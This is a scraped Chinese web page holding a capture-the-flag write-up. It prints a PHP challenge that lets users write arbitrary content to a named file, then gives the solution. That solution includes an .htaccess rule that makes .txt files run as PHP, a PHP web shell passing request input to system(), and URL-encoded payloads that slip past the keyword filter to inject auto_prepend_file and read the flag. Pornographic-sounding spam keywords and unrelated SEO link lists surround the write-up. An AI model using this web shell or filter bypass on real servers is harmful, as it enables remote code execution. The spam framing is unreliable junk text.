中文亚洲精品无码_熟女乱子伦免费_人人超碰人人爱国产_亚洲熟妇女综合网

當(dāng)前位置: 首頁(yè) > news >正文

webmaster網(wǎng)站制作地推接單正規(guī)平臺(tái)

webmaster網(wǎng)站制作,地推接單正規(guī)平臺(tái),深圳自適應(yīng)網(wǎng)站推廣價(jià)格,軟件資源進(jìn)入靶場(chǎng) <?php// 使用 scandir 函數(shù)掃描當(dāng)前目錄&#xff08;即腳本所在目錄&#xff09;下的所有文件和文件夾// 該函數(shù)會(huì)返回一個(gè)包含目錄下所有文件和文件夾名稱的數(shù)組$files scandir(./); // 遍歷掃描得到的文件和文件夾名稱數(shù)組foreach($files as $file) {// 使用 …

進(jìn)入靶場(chǎng)?

<?php// 使用 scandir 函數(shù)掃描當(dāng)前目錄(即腳本所在目錄)下的所有文件和文件夾// 該函數(shù)會(huì)返回一個(gè)包含目錄下所有文件和文件夾名稱的數(shù)組$files = scandir('./'); // 遍歷掃描得到的文件和文件夾名稱數(shù)組foreach($files as $file) {// 使用 is_file 函數(shù)檢查當(dāng)前遍歷到的元素是否為一個(gè)文件if(is_file($file)){// 檢查當(dāng)前文件是否不是 "index.php"if ($file !== "index.php") {// 如果不是 "index.php",則使用 unlink 函數(shù)刪除該文件unlink($file);}}}// 檢查 GET 請(qǐng)求中是否缺少 'content' 或 'filename' 參數(shù)if(!isset($_GET['content']) || !isset($_GET['filename'])) {// 如果缺少參數(shù),使用 highlight_file 函數(shù)高亮顯示當(dāng)前腳本文件的源代碼highlight_file(__FILE__);// 終止腳本執(zhí)行die();}// 從 GET 請(qǐng)求中獲取 'content' 參數(shù)的值,并賦值給 $content 變量$content = $_GET['content'];// 使用 stristr 函數(shù)檢查 $content 中是否包含特定的敏感關(guān)鍵詞// stristr 函數(shù)用于不區(qū)分大小寫(xiě)地查找字符串在另一個(gè)字符串中首次出現(xiàn)的位置if(stristr($content,'on') || stristr($content,'html') || stristr($content,'type') || stristr($content,'flag') || stristr($content,'upload') || stristr($content,'file')) {// 如果包含敏感關(guān)鍵詞,輸出 "Hacker" 提示信息echo "Hacker";// 終止腳本執(zhí)行die();}// 從 GET 請(qǐng)求中獲取 'filename' 參數(shù)的值,并賦值給 $filename 變量$filename = $_GET['filename'];// 使用 preg_match 函數(shù)檢查 $filename 是否包含除小寫(xiě)字母和點(diǎn)號(hào)之外的字符// 正則表達(dá)式 "/[^a-z\.]/" 表示匹配除小寫(xiě)字母和點(diǎn)號(hào)之外的任意字符if(preg_match("/[^a-z\.]/", $filename) == 1) {// 如果包含非法字符,輸出 "Hacker" 提示信息echo "Hacker";// 終止腳本執(zhí)行die();}// 再次掃描當(dāng)前目錄下的所有文件和文件夾// 這一步重復(fù)前面的文件刪除操作,確保在處理新文件之前目錄中除了 "index.php" 沒(méi)有其他文件$files = scandir('./'); foreach($files as $file) {if(is_file($file)){if ($file !== "index.php") {unlink($file);}}}// 使用 file_put_contents 函數(shù)將 $content 的內(nèi)容追加 "Hello, world" 后寫(xiě)入指定的文件// 若文件不存在,會(huì)創(chuàng)建該文件;若存在,則會(huì)覆蓋原有內(nèi)容file_put_contents($filename, $content . "\nHello, world");
?>

?這段 PHP 代碼的主要功能是先刪除當(dāng)前目錄下除?index.php?之外的所有文件,然后檢查 GET 請(qǐng)求中是否包含?content?和?filename?參數(shù)。如果參數(shù)存在,會(huì)進(jìn)一步檢查?content?中是否包含敏感關(guān)鍵詞,以及?filename?是否包含非法字符。若都通過(guò)檢查,會(huì)再次刪除當(dāng)前目錄下除?index.php?之外的所有文件,最后將?content?內(nèi)容追加?"Hello, world"?后寫(xiě)入指定的文件。

需要上傳兩個(gè)文件,一個(gè).txt文件執(zhí)行命令,一個(gè).htaccess文件解析.txt文件

.htaccess

<FilesMatch "\.txt$">SetHandler application/x-httpd-php
</FilesMatch>

.txt

<?php
if(isset($_REQUEST['cmd'])){system($_REQUEST['cmd']);
}
?>

?filename=.htaccess&content=php_value%20auto_prepend_fil%5C%0Ae%20.htaccess%0A%23%3C%3Fphp%20system('cat%20/fla?')%3B%3F%3E%5C

?content=php_value auto_prepend_fi\%0ale .htaccess%0a%23<?php system("cat /fl'a'g")?>\&filename=.htaccess

?

http://www.risenshineclean.com/news/63374.html

相關(guān)文章:

  • 出格做網(wǎng)站怎么樣優(yōu)化營(yíng)商環(huán)境心得體會(huì)個(gè)人
  • 內(nèi)蒙古創(chuàng)意網(wǎng)站開(kāi)發(fā)關(guān)鍵詞怎么選擇技巧
  • 網(wǎng)站建設(shè) 建站知識(shí)人民政府網(wǎng)站
  • 網(wǎng)銷每天需要怎么做廣州網(wǎng)站優(yōu)化公司
  • 刷排名凡搜網(wǎng)站寶可以免費(fèi)發(fā)帖的網(wǎng)站
  • 互聯(lián)網(wǎng)應(yīng)用開(kāi)發(fā)是什么seo 百度網(wǎng)盤(pán)
  • 石家莊疫情到底有多嚴(yán)重新的seo網(wǎng)站優(yōu)化排名 網(wǎng)站
  • wordpress分頁(yè)不起作用seo關(guān)鍵詞排名優(yōu)化評(píng)價(jià)
  • 鶴壁人民醫(yī)院網(wǎng)站誰(shuí)做的百度小說(shuō)搜索熱度排行榜
  • 10月哪個(gè)網(wǎng)站做電影票活動(dòng)獨(dú)立站seo怎么做
  • 2023年石家莊疫情怎么樣了杭州seo排名
  • 五合一免費(fèi)建站品牌推廣策略分析
  • wordpress js 插件開(kāi)發(fā)百度視頻排名優(yōu)化
  • wordpress文章圖片函數(shù)企業(yè)seo排名哪家好
  • 上海網(wǎng)站推廣方法seo快速排名軟件價(jià)格
  • 邯鄲做網(wǎng)站推廣的地方培訓(xùn)課程安排
  • 住房和城鄉(xiāng)建設(shè)部科技網(wǎng)站長(zhǎng)沙優(yōu)化科技
  • 有了 ftp服務(wù)器密碼 怎么改網(wǎng)站seo搜索引擎優(yōu)化課程
  • thinksns網(wǎng)站開(kāi)發(fā)安裝百度到手機(jī)桌面
  • 網(wǎng)址導(dǎo)航是什么瀏覽器蘋(píng)果aso優(yōu)化
  • 響水網(wǎng)站建設(shè)服務(wù)商2023免費(fèi)推廣入口
  • app源碼網(wǎng)站網(wǎng)絡(luò)違法犯罪舉報(bào)網(wǎng)站
  • 增光路網(wǎng)站建設(shè)哪些店鋪適合交換友情鏈接
  • 網(wǎng)絡(luò)推廣培訓(xùn)課程4萬(wàn)重慶seo報(bào)價(jià)
  • 如何在網(wǎng)站插做視頻優(yōu)化大師使用方法
  • 網(wǎng)站建設(shè)中 html模板淘客推廣
  • 東莞快速做網(wǎng)站東莞網(wǎng)絡(luò)公司電話
  • 表單大師 做網(wǎng)站怎么查網(wǎng)站是不是正規(guī)
  • 網(wǎng)站后臺(tái)管理方便嗎新疆今日頭條新聞
  • 網(wǎng)站怎么做留言板百度網(wǎng)站官網(wǎng)網(wǎng)址